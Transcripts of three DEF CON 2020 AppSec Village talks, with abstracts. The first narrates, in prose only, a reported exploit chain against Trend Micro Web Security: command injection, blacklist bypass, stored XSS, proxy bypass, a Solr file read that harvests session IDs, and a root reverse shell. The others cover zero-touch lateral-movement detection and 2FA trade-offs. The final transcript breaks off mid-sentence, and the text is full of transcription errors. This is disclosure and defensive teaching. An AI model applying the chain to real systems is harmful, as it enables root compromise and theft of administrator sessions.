course. And we are going to put all the compile files under the lib-compile folder. And if you go to the IntelliJ interface and look for the project settings, there is a library section in here, you can import those libraries and sources all together, which will tell the IntelliJ to, this is my Java software, IntelliJ will take the rest of the job, it's going to process all the classes. And you're going to be able to just finding a function that you are interested in, you will be just clicking it to go to the definition. And also, you can find a very interesting function that might be a problem in the definition. You can just by using the IDEs, you can find all the different locations where the specific function has been called. So I strongly suggest you to be a friend with IntelliJ or Eclipse if you are up to a wonderful research on Java application guys. So I beg your pardon. So we have access to the source code of the administrator interface. So we are ready to do for the last step, which was finding a vulnerability. There is a difference approach to do it, like top to bottom or bottom to top. But the top means you know the potentially vulnerable functions on the Java, let's say, you can directly search those functions within the code base. And if you believe that you just find a very interesting, very insecure way to use those potential vulnerable function, you can start from the bottom to go to the top in order to find out whether you are control to parameter that passed through all the function calls. Or you can start from top to bottom, which is like, you know, start by reading the filter or the middleware definitions and the classes, look for the authentication mechanism, and then search for all the controller or the request handler definition, which will be an important because that is the location where you can see the user controller parameters, etc. In that case, I was the top to bottom approach. I choose that approach for because of not very specific reason, I was like, you know, doing fun funny time on the Sunday, and I was just start reading the source code, and it was like a top to bottom approach. I wish I could show you all the code bases and everything, but I believe I don't have enough time to do it. So I just grabbed a very specific function definition, which name is a month device. It has to be a post request to be able to execute the function definition. And there is a very interesting if statement in here, it tells you if the request is coming from the local host, it is okay. If the request is not coming from the local host, I'm going to validate your session and your privilege as well. Since we don't have the username, the password, you know, this is going to be a problem for us because it is a password protections. If the request is not coming from the local host, and there is a one function call in here, get token, which will be have a very important role on our exfoliation. We will come back in later. So that was the important part of the function, and we are moving to do more important stuff. So it tells us that the request must be a post request and the post body, it is taken from the request and it is a GSM object. And we're going to get the month device string from the GSM data. And that part is quite interesting because it performs some sort of escaping. So if the month device contains a double code, it will be escaped. If it contains a back tick dollar sign, it will be escaped by the backslash. But the problem is, if it contains backslash, it will escape backslash one more time. So if we have the double code, it will be escaped one time, and it will be escaping backslash one more time in here. There isn't some sort of problem in here. And after that, there is a function call, which is a Isvalut month device, and it takes our parameter that we can control. And if we manage to pass that if statement, we are going to see XUiHalper CMD, which is sent to execute operating system command with a parameter that we are controlled. So we need to skip that if statement. It has to be returned to. So let's have a look at that one. Isvalut month device, it is just like a very weak blacklisting. It tells you it cannot be contained, bash, bnfs, pythons, slash, Perl, Python, et cetera, et cetera. It validates, it performs some sort of blacklisting on that one. But the problem is, it has the white space at the beginning of the Perl and the Python command in here. So it's a very weak blacklisting. We can bypass that without having any problem. So we have to keep that in our mind if we've managed to find a vulnerability. So all right, we can pass that part and we can reach in here. So it is time to read the XUiHalper CMD. And XUiHalper CMD, it is going to execute UI helper binary with a sub-CMD, which is a command that we can control. So what is UI helper? It is located in here and it has a root privilege and there is a suid bit. So all the commands will be executed with a root user. So if you find a way to execute our command, that command will be executed with the root privileges, which is something very, very important for us. And finally, that function calls XS-CMD, which is basically calls runtime.getRuntime.exec. So obviously we have command injection vulnerability in here. So we believe that we have the vulnerability in here and we need to do the proof of concept. Thanks to do reading a funny manual and the product feature steps of the methodology, we know where is which administrator interface, I mean, which many of them it is going to execute that specific endpoint. Of course, you can build it from scratch, but this is more easier for me. As you can see, that is the post request and there is a month device and we can inject our command in here because the dollar sign, it will be used for the execution and the dollar sign escaped one time and the backslash escaped one more time, which means there is no escaping at all. That backslash escaping did another one and there is nothing related with the dollar sign, which will helping us to inject our command. So basically we are executing sleep command with a 15 seconds with administrator, with a root privilege. So let's talk about the exploitation of that vulnerability as well. I am one of the Metasplit contributors and I usually using the Python dropper for the exploitation when I face the exploiting the Linux machines, but there is a problem about the Python dropper from the MSF venom of the Metasplit. It has to be included double code that wraps up our dropper command in order to pass it to the Python process. So that means we are not going to be able to directly use it because as you know, the double code has been escaped on the back-end service. So the idea is that we can use Perl because Perl can take a parameter with a single code which is allowed to use and basically the idea is simple. I want to execute Python dropper but I am going to put that Python command into the Perl command. So basically during the exploitation we are going to execute Perl which is going to execute first step of the Python dropper. When the Python execute it communicates with the handler and the handler sends the second stage. So there is a lot of execution one and after and there is a Ruby code as you can see in here that we can build a Perl command which includes which contains our Python command. So it's a quite nice trick. So I reported that vulnerabilities to the ZDI and of course ZDI told me that the authentication is required to exploit the vulnerability but we are going to see that the exploitation can be bypassed, guys. So we have to bypass authentication. Those are the initial ideas. We can find a stored cross-site script in vulnerability because we can force authenticated user to send HTTP request to the month device endpoint where we have the command injection and since the user is going to be manipulated by JavaScript that request will be sent to the endpoint with the authenticated user. So we don't have to be thinking about authentication request, authentication stuff. Another idea is it would be handy to find something as a Sarah fish vulnerability, some sort of some type of a Sarah vulnerability quite could be handy in order to communicate with internal services so that we can send a request from the localhost to the endpoint or you can go directly after the authentication bypass. I don't have too much time. I'm just going to show you how I find a stored cross-site scripting on the administrative interface. So as you can see in here, that is a very basic HTTP request to the proxy service. It tells to the proxy service that I want to send a get request to the pentest up below and proxy service does the job and sends the response back to the user. So that activities is being written into the administrative interface. Guys remember the Python and the Apache solar stuff that we have talked about 15 minutes ago. That activities has been written to the Apache solar database which is presented into the administrative interface. So the idea is that we can control that data in here because we can tell anything we want to the proxy service. So the idea is quite simple. As an attacker, we are going to intentionally dole on a very, very known malware through the proxy service. So proxy product can detect it and produce a log file and it will be like ringing all the alarms. I call the malware, etc. But the data will be written into the Apache solar which is being used in the administrative interface and very, very specifically in here. So when the system administrator logs in and checks what's happening, we can execute JavaScript code on the system administrator browser. And thanks to that JavaScript code, we can send an IX request to the vulnerable endpoint that we have found in the first place. So you know, there was a quite interesting XSS vulnerability because whenever the browser sending requests to the proxy, they are performing the full URL encoding in here. But I'm manually crafting the request to the proxy service. That means there will be a no encoding and that data is not being encoded on the administrator interface. Basically, we have a cross-site scripting spatial, the store cross-site scripting vulnerability in here. So instead of popping up other bugs, we can just call IX request to the endpoint that we have the command injection. So that was, I reported that vulnerability to the ZDI as well. As you can see in the vulnerability description, attacker can leverage this in a conjunction with other vulnerabilities to execute code in the context of the root user. But guys, cross-site scripting is a cool. I'm not underestimating any kind of vulnerabilities, but it is just not enough for me because there is a huge setback which requires the user interaction for the exploitation. I was like, okay, I just find something very cool, you know, intentional don't link malware, etc., etc. That is what's simple and cool. But I need to find a better way to continue the exploitation. But you know, I got another idea while I was spending a time to find an excess through the proxy service. So the idea is targeting proxy service itself. So as you can remember from the previous slides, that is the HTTP request, the very simple HTTP request to the proxy service itself. It tells the proxy service that I want to communicate with the Pantheon stock block. Proxy service, get the response and send it back to the user. So what happens if I tell the proxy service that I want you to communicate with yourself? In that case, it told me there is a self-referential request to proxy or forbidden. And I was like, all right, that means there is some sort of control and lots of if statements in the proxy service itself. What happens if I manage to trick the proxy service to communicate with an internal service? That was the main idea. So that is the function, get end user other notification function. I set a break point in here, which produced exactly same error message that we have seen in here. And I just sent the same request and it hit the break point and it tells you that get user notification or the notification has been called by the prepare proxy loop rejection, which has been called by the handle proxy loop, which has been called by the due processing. So we're going to read all of those functions. So within the due processing, there is a function call, which is a e-reverse proxy and the function is a member of the proxy config cache. So basically product try to understand like am I being placed as a reverse proxy? And in that case, handle proxy loop has been called. This function that we have seen on the previous slide. And that function calls TM socket address is same ADDR. That is the important part because that function performs full URL comparison with a URL of the proxy service with URL of the user try to communicate. So if it is a same address, it calls prepare proxy loop rejection call and we are seeing that error message. So I just changed the port number to the purchase order service. And due to that changes, there will be a no match in the full URL comparison on the proxy service and there is administrator interface of the Apache solar service. I'm just can communicate with it because of a very interesting bug in the process service. So as you can see in here, I'm allowed to communicate with the Apache solar service administrator interface. So all right, that was another very, very, very important vulnerability because we can we are going to leverage this vulnerability to the bypass authentication on the systems and in the end, we're going to chain all of them together guys. So Apache solar service in the box, I mean, in the product was very old version because it's not quite easy to upgrade your third party dependencies like Apache solar or database servers. And in these type of solutions, it's quite hard to upgrade to newer versions. So there was a very, very old vulnerability in Apache solar service, but it is exactly what I need. It is arbitrary file read vulnerability. So there is that is the name of the collection. And there is a replication endpoint, and the command has to be a file content, and you can try was back to the roots folder, and then you can call whatever you want. And that will gives you to reading any content of the file. So at the beginning, I wasn't there was no way to communicate with the Apache solar service, but we find a very interesting bug. And by exploiting that bug, we are going to read anything we want. So far, so good. I want you to remind a get talking function, you know, it was like a way behind of our presentation. Guys. All right. Do you remember that get talking function? It is going to help us what we are going to actually in here because let me yeah, because that function takes cookies from the HTTP request and it returns the value. But the problem is it's printed out the value and the name of two cookies. But the job application is running by the Tomcat process. So those standard outputs data will be written into the log file, which is a Catalina dot art file. So due to that little function, all of those valid session IDs written into the log file and we have arbitraried file read vulnerability. So what we are going to do that, we're going to exploit two vulnerability together in order to get the content of the Catalina dot art file, which contains a valid session IDs. And then we are going to collect all the session IDs together. And we can go to administrator interface in order to exploit comment injection vulnerability with active session IDs. So the idea is actually quite simple guys. We are going to in the first step, we are going to exploit a comparison bug in the proxy service, which help us to communicate with the Apache solar service that is running within the product itself. And this is a very old software which has a vulnerability and it is arbitraried file read and combination of that vulnerability. We are going to read Catalina dot art file. And we're going to by using regx, we're going to extract all the session IDs that we have. And there is a check session endpoint. I haven't talked about it because it was quite easy. There is a check session endpoint in the product. We are going to test all the session IDs we have in order to find out whether it is still active or not. And if you find the active session, we are going to exploit the comment injection vulnerability. And we are going to be executing operating system command with a root privilege, which will give us a C2 reverse shell to our command and control server. That is the idea. And of course, I have implemented a method split module that performs all of those steps automatically. And I have a video for it. I would like to, I guess, yeah, yeah, time is good. I guess I still have a minute. So let's see. And by the way, that method split module has been merged to the master branch of the method split project. So it just can go and fetch the module and install the product on your lab and have fun. So when we run, as you can see in here, it's tried to, it's exploits reverse process service and extract the Kotlin.out file. And of course, this is a demonstration. There is only one session ID in the log file and it's in the active. And by using the session IDs, it goes to the comment injection vulnerability and it's execute operating system command, which is a pro command. Pro command contains a Python command, you know, and all of those steps has been automatically done. And as you can see in here, we have a root session on the back filter solution of the company, guys. That's it. Thank you very much. Thanks everybody.
|
Most security products require to be placed in the heart of the organization's IT configuration. Even though we are highly paranoid and security aware about every single third party tool that we include in our IT structure; we lose these concerns when it comes to security products. We forget to see that even though these are security products in their nature; they are not necessarily secure in terms of their operation; despite the fact that they require much more permission than any other software. In this talk, I will take you through the steps of vulnerability research, which attack vectors were more promising than the others, which critical vulnerabilities were easier to find, how was the exploiting phase and much more. To do that, I will be using one of my 0day remote code execution exploit that targets Trend Micro Web Security product, which uses a combination of 3 different vulnerabilities to gain RCE as a case-study.
|
10.5446/51618 (DOI)
|
Hey, AppSeg village. Welcome back and get ready for another talk. Coming up next, we've got Can't Touch This, detecting lateral movement in zero-touch environments. Philip Marlowe is going to be presenting this. Philip is a cybersecurity and DevOps engineer. He helps organizations understand how to adopt DevOps practices to increase their security rather than sacrifice it in the name of speed. Philip holds several security, cloud, and agile certifications, and is currently pursuing a master's degree in information security engineering at SANS Technology Institute. Please give it up for Philip Marlowe. Hello, everyone, and welcome to Can't Touch This, detecting lateral movement in zero-touch environments. In this talk, we're going to talk some about DevOps and how to detect attackers trying to move into your production environments. Before we get started, a few disclaimers and acknowledgments. First off, I work for the MITRE Corporation, but nothing I'm saying today reflects their opinion. Also, I'm a student at the SANS Technology Institute working on my master's degree. Huge shout out to my faculty research advisor, but I'm not speaking for her or SANS today either. And lastly, big thank you to my wife, Madeline, once again, not speaking for her in this presentation today. So who am I? I'm Philip, and professionally, I really enjoy the intersection of security and DevOps. Yes, you can call it DevSecOps if you want. I don't really care either way. I wrote my first vulnerable code in elementary school. I was writing a blogging platform for my family and right in there because I didn't know any better, put a SQL injection vulnerability. I was a big surprise for them when they found out we've been hacked because of that. I first began learning to exploit applications in middle school when I received as a president the book, Hacking the Art of Exploitation. And I've been involved in application security one way or another ever since then. Today's my first time as a DEF CON speaker, and I'm super excited to be here. And one of the things I really enjoy is being able to learn through hacking. And you'll see a flavor of that throughout this presentation as we take both the attacker and the defender point of view. So if you're not already on board, why should I care about DevOps? Well, for one, you probably don't have any choice. If you're running any kind of application, that's the way it is now. You probably just need to learn about it. You know, if you're red team standing up command and control infrastructure, helps to have DevOps. Your blue team trying to implement monitoring and detection helps to have DevOps application security. DevOps is the way of life now. And, you know, provides all these security benefits on top of reliability benefits and maintainability benefits for the other parts of the business. So let's take a look at a very simplified environment. And let's take a look at it from the attacker's point of view. We want to get to something on the application server. Maybe we want to steal data off of it, or maybe we just want to use the hefty server power for crypto mining. Either way, we've got three basic options. Option one is to just go straight in the front door and attack the application itself in order to get access to the server. This is pretty simple. You may be there's a firewall or IDS you have to evade, but, you know, you're not making a lot of hops around to finally get to where you want to be. But it's also not 2002 anymore. The situation has gotten a lot better in how we protect our application servers. So while this once might have been the best way in, it's not really anymore. Report after report from places like FireEye and Verizon have shown a much more popular way into networks these days is by social engineering users in one way or another. In this case, we're going to take a look at phishing a operator or developer on their employee workstation to give us our initial access. Then in method two, we're going to move laterally through the Bastion host and finally to the app server. We'll talk in a couple of slides about why this works so well. But before we get there, let's talk a little bit about option three. With DevOps implemented these days, another way into that protected app server is through the DevOps pipeline itself. But there are a lot more hops here and a lot more ways that can go wrong and a lot more opportunities to detect this attempt. It goes through source control repos, test servers, and configuration servers before we ever get to our intended target. So how does traditional application deployment work? Well, developer give ops a deployment package and if we're lucky, some install instructions and then ops is going to go and log into the application server manually install that software. Pretty simple. And then an update comes along and you have to go and manually log in and update. And then the security patch comes along and you have to go log in and update. And this manual logging in and updating is going to be a real problem for detecting lateral movement. So what does traditional lateral movement look like? Because they're logging in to do configuration and updates all the time, ops has highly privileged credentials. This might take the form of SSH keys or API tokens. And oftentimes they're stored in plain text on their employee workstations. If you've already fished that user, those are really easy and really juicy targets to steal those credentials and move further into the environment. All right, so that sounds like it's a problem. What is this zero touch concept? Google defined zero touch networking and zero touch production. And they've given several presentations on what that means to them and how they've implemented it in their environment. Overall, it's about how we can abstract away managing the production environment. So that we're not doing those manual logins, change things, configure and update anymore. And while Google is one of the only companies to use the zero touch nomenclature, a lot of companies do this. Often it's just a result of being very mature in their DevOps practices that everything is handled by automation rather than human users. So zero touch deployment looks very different. Every change is made by automation and pre validated. This means no humans logging in. And that's key for our talk today. You'll also notice on Google's presentation, there's a lot of information about the zero touch deployment. So what does this zero touch deployment look like in practice? Well, rather than having a user log into the app server via a bastion host, since it's a very simple application, it's a very simple application. So we're going to use the zero touch deployment as a tool to help us understand what's going on in the rather than having a user log into the app server via bastion host. Since that's no longer allowed, every change has to go through that DevOps deployment pipeline. Looking at how attackers are going to move laterally, however, let's compare and contrast between the traditional and the zero touch deployments. So I'm about to play an animation and keep an eye out for the malicious connection between the bastion host and the app server. It's going to be a slightly different color to arrow. Did you catch it? Have you seen it yet? It's kind of tricky to find. And this is this when it stands out in some way. If we're looking at encrypted connections like SSH or HTTPS, it may not stand out in any way unless you're doing some kind of break and inspect in the middle. Now let's compare it to zero touch. In the zero touch deployment, you're going to see a bunch of arrows again showing normal benign traffic. And you'll also see one arrow that'll look a little different being our attacker trying to move laterally. See if it's easier to spot this time. I'll bet that was a lot easier. And as soon as it came up, you noticed it. This is the whole concept that we want to use writing this detection. So how do we actually go about detecting this lateral movement? There's a few things we need to do. First, we need to define all of the protected servers. In our simplified environment, that's just the app server. But it might also include DevOps automation servers. It might include web servers, database servers, all of which might be behind load balancers. Whatever humans should not be logging into, that goes in this list. We also need to define all of the human access points into the environment. Again, in our simplified environment, that's just the bastion host. But depending on your network architecture, you might need to include other sets of load balance machines, virtual desktops, employee workstations, anything of that nature. That goes in the second list. And then all we do to detect is look for any connections between those two sets of servers. Then alert, investigate, enjoy detecting this lateral movement. Let's take a quick look at what this looks like in practice. So for the demo, we're going to look at a couple of scenarios. First up, let me tell you what you're seeing. In this environment, I've got a bastion host that's used for manually accessing it when needed, an application server, and a configuration server running puppet. So just to make sure that there's nothing up my sleeves, what we're going to do for this demo is run some puppet configuration in the background. This will be traffic both within the environment to the puppet server and external to the environment, SSH connections and HTTPS connections out to the wider internet. So let's get that started. And then while this runs, jump over to the bastion host. And as you can see, we've already compromised the bastion host. And we see some SSH credentials that we found, and in fact, some SSH credentials for the application server that has the goodies we want to get to. So we'll run our evil script file. And in real life, this might be installing a crypto minor or any number of things. In this case, just modifying the configuration files that puppet is managing to show that we've actually gotten in and had the ability to do evil if we want it to. So now we're going to jump over to the network monitor. This is a plain instance of security onion with all of the usual defaults and alerts installed. And what we're looking at right now are the Zik notices. And may turn on the refresh, but you'll see a whole lot of nothing. Zero, no results found no results found. If we switch over to squirt and refresh it. Same thing. No result. No result. And this is exactly what we expect from a default instance of a network monitor. It's not going to alert on connections like this. Let me enable the rules we've been talking about. And then we'll come back and we'll try this again. And now that I've enabled the zero touch rules, let's try it again and see what's changed. As you can see, the lab server is still emulating real traffic by reaching out to the puppet configuration server and to the external internet. Let's go over to the bastion and run our evil script again. Same thing utilizing those compromised SSH credentials to reach in and modify the app server. Now we'll jump over to the network monitor. And as you can see, we're starting to get alerts. Zik has noticed a couple of connections from the bastion host to the app server. And if we switch over, you'll see the same thing in squirt as well. Notice how they work slightly differently. The squirt gives us many more alerts because it's looking individually at the packets traversing the network versus Zik gives us total number of connections. But either way, we're seeing the alerts that we're violating this zero touch policy and that it's a good indicator of lateral movement. So you want to start doing this in your environment as well. Well, first off, if you're not zero touch yet, you should move that direction. Implement zero touch. It's got a lot of benefits besides this one. When you're ready to implement this detection, use your platform of choice. Whatever you're already using is going to be best. There's no need to go get specialized software or hardware in order to do this. Use your existing IDS or network monitor. It's a very simple detection to include. But then you need to look at the data and the information to how you tailor it for your specific environment. In the example, it was looking for all TCP connections because I wanted to catch the broadest range of lateral movement. But that might not make sense for your environment. So maybe you need to tailor it down to only look for SSH connections or, you know, whatever makes sense for your environment. And then the detections I showed were all very simple. It just looked for that connection and alerted. But that can be just the beginning of a bigger process. Imagine with ZEKE instead of raising a notice if we correlated that with other suspicious traffic that we'd seen, maybe some data exfiltration traffic, and then we could automatically provide analysts with here's the map of the attackers path through the network. Starting to add some of those higher end capabilities really makes this powerful. And finally, I wanted to leave you with some lessons learned from this project. And there are two that really jumped out at me. The first is know your network. And this is not just know your networking. It is know your specific network. Justin Henderson and Mick Douglas who teach the tactical seam class for SANS really nailed this. And I learned this from them. So a huge shout out to them. Knowing the specifics of your network lets you do really cool things in monitoring it. Things that aren't possible in generic networks, such as the detection we talked about today. And then secondly, don't be afraid to look for stupid simple things. All we were looking at today was the presence of a connection. Tying together these two lessons learned is really this whole project is looking for something simple like the presence of a connection and knowing your network well enough to be able to say that's unusual. That's a problem. Thank you so much for attending the presentation today. Shout out again to the SANS team for their help and support with the research project. If you've got any questions about this project, AppSec, DevOps, the SANS masters program or anything related, the best way to get in contact with me is via Twitter. My handle's on the screen now. If you're viewing the live presentation, I look forward to chatting with you during the Q&A immediately afterwards in Discord. Again, I'm Philip Marlowe. Thanks for coming.
|
Zero-touch environments are a product of the fast-moving world of DevOps which is being adopted by an increasing number of successful companies. This session will show that by leveraging the constraints of this environment, we can identify malicious network traffic which would otherwise blend into the noise.
|
10.5446/51620 (DOI)
|
Good morning and welcome to the Apssec Village. I hope you were here for our first keynote speaker. Welcome to day one of Apssec Village, part of DEF CON 2020. I really wish we were all together in one big room like we were last year, but that's just not going to happen this year. So in the meantime, thanks for tuning in. Thanks for watching along with us. I want to take the moment to introduce you to our next speaker. Our next presentation is going to be 2FA in 2020 and beyond by Kelly Robinson. Kelly works on the account security team at Twilio. Previously she worked in a variety of API platforms and data engineering roles at startups. Her research focuses on authentication user experience and design trade-offs for different risk profiles and 2FA channels. We all know how important 2FA is today. We all want to protect our accounts and I'm looking forward to this talk. I hope you are too, so please give a warm Apssec Village welcome to Kelly Robinson. Hey everyone. I am coming to you today from Brooklyn in New York and I hope that you're doing well wherever you may be on this March 152nd. Hopefully your day is going better than the person who has this password. But even though I trust everyone tuning into a DEF CON talk to have better password hygiene than something as simple as 1, 2, 3, 4, 5, 6, the fact is there's still a lot of folks out there with short, guessable passwords or people that are reusing passwords across multiple sites. As much as we'd like to believe that we're better than this, the website haveabeneown.com proves that simple passwords like 1, 2, 3, 4, 5, 6 are still incredibly common. This password has been seen almost 24 million times across data breaches. Attackers can use this to do credential stuffing attacks across the web and it can basically allow them to hack into a lot of accounts and compromise a lot of credentials and ultimately make a lot of money off of unsuspecting individuals. And that's what we're here to discuss today. This reality where we are so owned that passwords are no longer enough, how other factors, second factors in fact, can help us stay more secure and how to evaluate the different options out there. So my name is Kelly Robinson. I have been working at Twilio for about three years. I specifically work on Twilio's account security team working with our products for things like verify, look up, anything that has to do with phone verification, two factor authentication, phone and email intelligence, things like that. And this team has evolved a lot. We acquired Authy about five years ago and that was kind of the genesis of the team. So Authy is our free consumer application that was recently rented to include the Twilio name about five years later. But we also have APIs for adding things like two factor authentication into your applications. And I spend a good chunk of my time educating developers about security, especially when it comes to authentication itself. And so this talk is going to incorporate a lot of the things that I've learned in the last few years working with developers on a variety of challenges and our customers on their authentication challenges as well. And the failure of good authentication often results in what we call account takeover or ATO. And this is why this is such a big problem, right? Like if there wasn't anything of value on the other side of an account, we wouldn't be as concerned about this. But this is a $7 billion problem. So the end industry is really incentivized to find a solution here. And from the 2020 Javelin Strategy and Research study that just came out a few months ago, one of the things that they noted is that account takeover fraud is one of the hardest types of fraud to identify because there's so many channels, multi-channel account access and the desire to reduce friction in the consumer experience. And so we're trying to make it easy for people to log in, but we also want to keep out the people that don't, that shouldn't have access to those accounts. And those can sometimes be conflicting goals. So how do we accomplish this and how do we accomplish those goals? So protecting our accounts, we have these three types of factors that we'll talk about. You need to use a factor of authentication. And using any two of these means that you're using two-factor authentication. So there are three types of factors that we talk about. Something that you know, this could be like a password, something that you have, this could be a key or a phone, and then something that you are. So this is something biometrics like a fingerprint or face ID or something like that. And all the factors that we're going to be talking about today are channels that fall into this possession category. And I just kind of wanted to go over what the different pros and cons of a lot of these different common channels for two-factor authentication are so we can think about why we would or would not enable some of these types of channels. And starting with second factor, authentication using SMS two-facodes. And so one of the big reasons that people still like SMS-based two-fac is that onboarding is so easy. So about 99% of Americans have a phone capable of receiving text messages. And that makes a big difference, right? Like if you can't get people to turn on two-fac or opt into two-fac, then you're not going to have any of the benefits of having the second factor offered to them. And because of this easy onboarding, because it's a familiar experience now, this is something that a lot of companies still like to offer because it's offering that additional security without that additional friction. Unfortunately, as a lot of people know, SMS-based two-fac is not that secure. So one of the main reasons that we say this is because of something called SIM swapping. So this is where an attacker could use either social engineering or bribery to get my SIM card sent to you. And then you could basically take over control of my phone number. And so it's not device control. So SIM swapping allows you to take control of a phone number. And that can give you a lot of access to things that are being sent to me, like two-factor authentication codes. So SMS one-time passwords are really convenient, but they are an insecure channel. The next thing that I wanted to talk about was TOTP or time-based one-time passwords. And this is a way to generate tokens based on an algorithm. So the inputs here are a secret key in your system time. And those get put through a one-way function that pops out the truncated token. So this is what Google Authenticator, Authy, apps like that use as an open standard. And Symmetric Key Cryptography offers increased security compared to SMS. But if somebody gets access to that shared secret, then the method is easy to compromise. And you might be saying, like, well, don't leak that secret. But one of the ways that we share that secret is by scanning a QR code. There's ways that QR code can get leaked. At a previous job, we used to keep a copy of a QR code for TOTP in the shared one password file that we used for engineering onboarding because we wanted to enable 2FA, but we needed multiple people to have access to it. And so that's one example of how a TOTP secret could get leaked. It offers also some distinct advantages. Like I mentioned, it's an open standard, which is pretty cool. So you can use the app of your choice to do this. And also because the inputs are offline inputs, this method is also available offline. So, you know, not that anybody's doing a ton of traveling right now, but this is really useful for people when they're like on a plane or in a foreign country where they might not have good cell service or cell service of any kind. But unfortunately, this does require an app download. And so this is something that you want to keep in mind because that's going to add additional friction to get people to sign out for this method. And then I do want to mention the expiration user experience because in a study on the usability of different factors, researchers found that two thirds of participants using TOTP via Google Authenticator had problems entering the six-digit code before it timed out. And so that could be a problem depending on the types of users that might be using this. That expiration logic helps keep it secure, but it also could make it harder to use. Overall, this is a pretty good option. We see a lot of security-conscious companies adding TOTP as a 2FA option. And it's a really good next step of a way to add an open source, open standard option on top of SMSV2FA if you want to add additional security. So I also wanted to talk about pre-generated codes. And so these are something called, you know, like we might know these as backup codes. You don't see these used a lot for ongoing login. But I wanted to mention these because a study that I'm going to reference talks about using pre-generated codes. And then the benefit is that these are really easy to use. These are basically like pass codes or passwords that are generated for you. So they're less likely to be reused. They're more likely to be more secure. They're not going to be one, two, three, four, five, six. But you know, because of that 25% of participants in this study noted that these pre-generated codes didn't really feel secure though because they're just kind of written down on a piece of paper. And the other problem with this is if you've ever been somebody that has been asked to store backup codes or implemented a system that has this kind of system, like how do you store those? A lot of companies don't give you real guidance on that. And this is something that might not just like feel that secure. So this is something that I think is an option for backups, but the ongoing usability of it might not be super practical. Finally, I want to talk about push authentication. And this was really popularized by apps like Duo Authenticator. And users love this because it's so low friction. So you could approve or deny a login request correctly from your smartwatch. And it uses asymmetric keep cryptography, which means that you have two keys. The private key is only ever going to be stored on your device. And so that really keeps you more secure and prevents you from leaking a shared secret like you might be able to with TOTP. And this is the only form of 2FA that adds the option to explicitly deny a login. But unfortunately, it's so low friction that you could easily approve an authorization request just to get rid of it. And so if somebody is attempting to attack your accounts in the middle of the night, you might be able to unintentionally approve a request just to make it go away. And this also is a proprietary solution. So it's going to require a special app. So you could do this with something like Authy, you could do this with something like Duo, and you can also bake this into your own application. But like with TOTP, getting users to download another app is always going to be a challenge. I think the way that we'll see this become more common is with companies that have a lot of mobile users that already have their apps baking this into the existing apps that are already on their phone. So you've seen this with something like Google Prompt. If you try to, if you enable Google Prompt and try to log in on the browser, what Google will do is say, Hey, check your phone, open up any Google app on your phone, and it will pop up this type of, is this you trying to log in message without requiring that the user downloads an additional app. And so that is one of the ways that you can kind of get around that user experience hurdle of having users opt into a more secure solution. This seems great, it's really cryptographically secure, but I think the onboarding logic is going to be something that we're going to struggle with for the next few years until this becomes more common. And there's always this problem that it might be too convenient. And then lastly, we'll talk about web off then. And this is the new hotness for good reason. It offers a really high level of security with asymmetric key cryptography like push authentication. So the private key is only ever going to be stored on the device, but it's also an open standard like to TTP. So the biggest drawbacks with web off then right now is that it's still relatively new and setup can be a little bit clunky. You know, some of the new devices are starting to bake this into the actual device itself. And so Android phones can now be used as a web off and authenticator for Google products. But this is not something that you're seeing as widespread yet. Hopefully this will be something that will be rolling out more widespread with devices that we already have. But for something kind of third party that you can use to do this like a Yuba key, you need that additional authenticator right now to do this in a lot of places. An authenticator that's compatible with the standard. And you know, Yuba keys, Titan keys are not exactly cheap. And like you can't also reasonably expect that every user of your application will have one. So until something like this becomes a standard available, like on every mobile phone, it's going to be harder to implement this across the board. So like I said, as more devices like we already have, like our phones and our laptops start to adopt the standard and become those kind of compatible authenticators, we will see an uptake in this factor. And I think this is where you can kind of set your sights where things will be going. But it is more currently more popular with companies. So like your IT department can get you the Yuba key right now that can hand you the physical token. So that's something where you might also be seeing this. But a lot of these factors were kind of focusing on as a consumer application channel. But I do want to back up these kind of qualitative examples with some more quantitative data. And to do that, I wanted to think about more granularly how we're measuring the effectiveness of 2FA. And so separating this into three categories, kind of thinking about this in the life cycle of 2FA. So there is this onboarding consideration, right, that I've mentioned a couple of times already. There's also user experience, ongoing user experience for how you're going to work with these different channels as you're using them on an ongoing basis. And then also the account recovery side of things, like what happens when you lose one of these factors? What do you do at that point? Is there a path to recovery there? And so the research that I'm talking about is from Brigham Young University was presented at the SUPS conference last August. And so the studies focused on setting up five factors. And so the factors that they talked about are the ones that we kind of already walked through, which were SMS, TOTP, pre-generated codes, push authentication, and U2F security keys. So a couple of important caveats is the study didn't take into account how to store pre-generated codes. And so that's something that I think is pretty important for this type of channel. But 25% of participants noted that the pre-generated codes just didn't feel secure. But when it comes to factor setup, this is the winner from the study. But like I said, the code storage wasn't considered for timing. So I don't know exactly what that would be like on an ongoing basis. From a different study in 2018 that focused just on UBIC keys, I think the study is really interesting because the success varied a lot depending on the platform that they were setting it up on, even though the channel, the thing that they were using to set up the U2F was always a UBIC key. It was always the same UBIC key that they were using across channels. So 83% of people were successful on Google, where only 32% of people were successful on Facebook. And if you've been following U2F and WebFN, you know a lot has changed since 2018. But I do think this is a really interesting look at how onboarding user experience impacts user success. And so you can guide people towards a successful solution here. But you don't want to guide people in a way like Microsoft Authenticator or Windows Logon Authorization Tool did where more people locked themselves out of their computer than were able to successfully set it up for that particular platform. So moving on to usability, one measure of usability was the amount of time that it took to authenticate. And in that metric, U2F and push were the winners there. So they have the fastest median authentication times. So compared to SMS, some duo research from last year said that this can save people 13 to 18 minutes annually in terms of ongoing authentications, if time is something that you're concerned about, and this is a measure of usability ongoing. But the system usability scale or SUS, this is something that's a standard measurement used by researchers for this type of thing. So actually, all of the methods had a pretty good usability score, but TOTP came out on top. Again, this is like ignoring just passwords. So turns out people don't like adding a second factor to a lot of their authentication because that's additional friction. But if you're going to be using a second factor, then TOTP was what they considered most usable. And this actually surprised me because this was the same study that said that two thirds of users have issued with the timeout, but that didn't affect their rating here. So maybe that's something that we don't need to be as concerned about. I do want to point out that there was somewhat of an inverse relationship here because U2F and push had some of the lower usability scores. So the researchers observed that faster authentication does not necessarily mean higher usability. So this is something that we're looking at. And you might notice that like SMS does not come out on top on any of these people didn't really like it as a factor was one of the lower factors for the authentication score. But I do think that even though there's a lot of trade-offs to the level of security in these options, it's important to note that SMS face 2FA is still better than no 2FA at all. And this is really easy for me to say like, you know, I work for a company that does this, but there's research here to back me up. So a 2019 Google study found that an SMS code sent to a recovery phone number helped block 100% of automated bots, 96% of bulk fishing attacks, and 76% of targeted attacks. So it's still really good coverage, especially for something that's really easy to set up that might have higher likelihood that users are actually going to turn on a second factor. But when you start looking at push authentication, there is increased protection. So this is gets bulk fishing attack protection up to 99% and has a 90% effectiveness for targeted attacks as well. So you have different options for 2FA, but you also do need to get your users to enable the extra security. And adoption of 2FA is pretty 